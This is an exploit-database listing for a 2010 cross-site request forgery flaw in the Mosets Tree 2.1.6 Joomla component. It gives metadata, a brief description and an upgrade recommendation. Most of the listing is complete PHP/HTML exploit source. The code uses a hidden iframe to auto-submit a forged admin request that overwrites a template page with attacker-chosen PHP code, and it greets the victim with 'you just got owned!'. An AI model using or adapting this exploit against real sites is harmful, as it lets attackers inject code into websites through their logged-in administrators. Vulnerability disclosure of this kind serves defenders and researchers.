header-logo
Suggest Exploit
vendor:
Mosets Tree 2.1.6
by:
jdc
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Mosets Tree 2.1.6
Affected Version From: 2.1.6
Affected Version To: 2.1.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF

Mosets Tree 2.1.6 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can exploit this vulnerability by getting a logged in admin to click the wrong link. This will allow the attacker to overwrite the template page with arbitrary code. This vulnerability was patched in version 2.1.7.

Mitigation:

Upgrade to version 2.1.7 or later.
Source

Exploit-DB raw data:

<?php
/**
  * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
  * 3 October 2010
  * jdc
  *
  * How it works - admin template form has no nonce
  * How to exploit - get a logged in admin to click the wrong link ;)
  * Patched in 2.1.7
  */
// change these
$target = 'http://localhost/joomla';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
     'pagecontent' => $exploit,
     'template' => 'm2',
     'option' => 'com_mtree',
     'task' => 'save_templatepage',
     'page' => $page
);
?>
<html>
<body>
<?php if (@$_GET['iframe']) : ?>
<form id="csrf" action="<?php echo $target.$path; ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v); ?>" 
name="<?php echo $k; ?>" />
<?php endforeach; ?>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
</div>
<?php endif; ?>
</body>
</html>